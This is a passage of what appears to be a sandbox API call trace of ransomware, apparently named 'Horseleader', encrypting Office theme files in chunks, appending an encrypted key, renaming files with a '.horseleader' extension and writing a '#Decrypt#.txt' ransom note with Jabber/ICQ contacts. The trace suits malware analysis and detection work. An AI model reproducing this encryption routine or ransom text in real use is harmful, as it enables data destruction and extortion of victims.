hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xd97, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.257] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.257] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0246.257] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.257] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.257] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.257] lstrlenW (lpString=".testttjffg") returned 11 [0246.257] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.257] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.257] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.258] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 80 [0246.258] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.258] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3479) returned 1 [0246.258] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xd97, lpOverlapped=0x0) returned 1 [0246.260] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff269, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.260] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xd97, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xd97, lpOverlapped=0x0) returned 1 [0246.261] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.261] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.261] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.261] CloseHandle (hObject=0x1a4) returned 1 [0246.261] GetProcessHeap () returned 0x780000 [0246.261] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.261] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.horseleader") returned 92 [0246.261] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.horseleader")) returned 1 [0246.262] GetProcessHeap () returned 0x780000 [0246.262] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.262] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7c5d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.263] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.263] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0246.263] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.263] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.263] lstrlenW (lpString=".testttjffg") returned 11 [0246.263] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.263] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.263] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 81 [0246.264] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.264] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=31837) returned 1 [0246.264] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.266] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.267] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.267] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2c5d, lpOverlapped=0x0) returned 1 [0246.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd3a3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2c5d, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2c5d, lpOverlapped=0x0) returned 1 [0246.268] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.268] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.268] CloseHandle (hObject=0x1a4) returned 1 [0246.268] GetProcessHeap () returned 0x780000 [0246.268] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.269] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.horseleader") returned 93 [0246.269] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.horseleader")) returned 1 [0246.269] GetProcessHeap () returned 0x780000 [0246.269] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.269] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x363aa000, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x7c5d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.270] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.270] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\#Decrypt#.txt") returned 82 [0246.270] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.270] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.272] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.272] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.272] CloseHandle (hObject=0x158) returned 1 [0246.272] GetProcessHeap () returned 0x780000 [0246.272] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.272] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="BREEZE", cAlternateFileName="")) returned 1 [0246.272] lstrcmpiW (lpString1="BREEZE", lpString2="Windows") returned -1 [0246.272] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE") returned 66 [0246.272] lstrcmpW (lpString1="BREEZE", lpString2=".") returned 1 [0246.272] lstrcmpW (lpString1="BREEZE", lpString2="..") returned 1 [0246.272] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.272] GetProcessHeap () returned 0x780000 [0246.272] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.273] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*") returned 68 [0246.273] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.274] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\.") returned 68 [0246.274] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.274] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51a61ad0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d462ff0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.274] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\..") returned 69 [0246.274] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.274] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.274] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea563500, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51a61ad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xea563500, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1a537, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="BREEZE.ELM", cAlternateFileName="")) returned 1 [0246.274] lstrcmpiW (lpString1="BREEZE.ELM", lpString2="Windows") returned -1 [0246.274] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0246.274] StrStrIW (lpFirst="BREEZE.ELM", lpSrch=".horseleader") returned 0x0 [0246.274] lstrcmpW (lpString1="BREEZE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.274] lstrcmpW (lpString1="BREEZE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.274] lstrlenW (lpString=".testttjffg") returned 11 [0246.274] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.274] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.274] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.275] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.275] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM") returned 77 [0246.275] StrStrW (lpFirst="BREEZE.ELM", lpSrch=".txt") returned 0x0 [0246.275] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=107831) returned 1 [0246.275] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.275] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.278] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.278] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xaa9b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.280] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.280] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x15537, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.280] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.281] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.281] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.282] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.282] CloseHandle (hObject=0x1a4) returned 1 [0246.282] GetProcessHeap () returned 0x780000 [0246.282] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.282] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.horseleader") returned 89 [0246.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\BREEZE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\breeze.elm.horseleader")) returned 1 [0246.283] GetProcessHeap () returned 0x780000 [0246.283] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.283] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x363aa000, 